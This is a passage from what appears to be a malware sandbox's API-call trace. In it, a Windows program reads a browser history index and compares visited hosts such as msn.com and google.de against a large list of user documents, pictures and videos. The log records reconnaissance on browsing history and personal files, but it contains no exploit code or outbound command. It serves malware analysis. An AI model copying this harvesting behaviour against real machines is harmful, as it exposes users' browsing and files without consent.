_String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.925] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned -1 [0085.925] wcslen (_String=":host: www.msn.com") returned 0x12 [0085.925] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.925] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.925] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x281b24, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b24*=0x100, lpOverlapped=0x0) returned 1 [0085.926] _strlwr (in: _Str="http://www.msn.com/de-de/" | out: _Str="http://www.msn.com/de-de/") returned="http://www.msn.com/de-de/" [0085.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x285e0b, cbMultiByte=-1, lpWideCharStr=0x281b80, cchWideChar=8192 | out: lpWideCharStr="http://www.msn.com/de-de/") returned 26 [0085.926] wcscmp (_String1="http://www.msn.com/de-de/", _String2=":host: www.msn.com") returned 1 [0085.926] wcscmp (_String1="http://www.msn.com/de-de/", _String2="https://www.google.de/") returned -1 [0085.926] wcscmp (_String1="http://www.msn.com/de-de/", _String2="http://www.msn.com/de-de/") returned 0 [0085.926] SetFilePointer (in: hFile=0xa4, lDistanceToMove=21248, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5300 [0085.926] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.926] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.926] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x281b24, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b24*=0x100, lpOverlapped=0x0) returned 1 [0085.926] _strlwr (in: _Str=":Host: www.google.de" | out: _Str=":host: www.google.de") returned=":host: www.google.de" [0085.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x285e0b, cbMultiByte=-1, lpWideCharStr=0x281b80, cchWideChar=8192 | out: lpWideCharStr=":host: www.google.de") returned 21 [0085.926] wcscmp (_String1=":host: www.google.de", _String2=":host: www.msn.com") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="https://www.google.de/") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="http://www.msn.com/de-de/") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="https://support.microsoft.com/products/internet-explorer") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="https://www.microsoft.com/en-us/iegallery") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="http://www.iegallery.com/en/addons/") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="https://support.microsoft.com/en-us/products/internet-explorer") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="http://go.microsoft.com/fwlink/") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="https://support.microsoft.com/internet-explorer") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="http://www.msn.com/") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2=":host: computer") returned 1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned -1 [0085.926] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned -1 [0085.927] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned -1 [0085.928] wcscmp (_String1=":host: www.google.de", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned -1 [0085.928] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.928] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.928] SetFilePointer (in: hFile=0xa4, lDistanceToMove=21632, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5480 [0085.928] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.929] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.929] SetFilePointer (in: hFile=0xa4, lDistanceToMove=21760, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5500 [0085.929] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.929] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.929] SetFilePointer (in: hFile=0xa4, lDistanceToMove=21888, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5580 [0085.929] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.929] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.929] SetFilePointer (in: hFile=0xa4, lDistanceToMove=22016, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5600 [0085.929] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.929] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.929] SetFilePointer (in: hFile=0xa4, lDistanceToMove=22144, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5680 [0085.929] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.929] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.929] SetFilePointer (in: hFile=0xa4, lDistanceToMove=22272, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5700 [0085.929] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.929] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.929] SetFilePointer (in: hFile=0xa4, lDistanceToMove=22400, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5780 [0085.929] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.929] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.929] SetFilePointer (in: hFile=0xa4, lDistanceToMove=22528, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5800 [0085.929] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.929] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.929] SetFilePointer (in: hFile=0xa4, lDistanceToMove=22656, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5880 [0085.930] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.930] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.930] SetFilePointer (in: hFile=0xa4, lDistanceToMove=22784, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5900 [0085.930] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.930] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.930] SetFilePointer (in: hFile=0xa4, lDistanceToMove=22912, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5980 [0085.930] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, 